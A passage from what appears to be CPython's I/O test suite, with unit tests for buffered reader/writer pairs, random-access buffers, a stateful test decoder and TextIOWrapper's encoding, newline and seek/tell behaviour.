self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
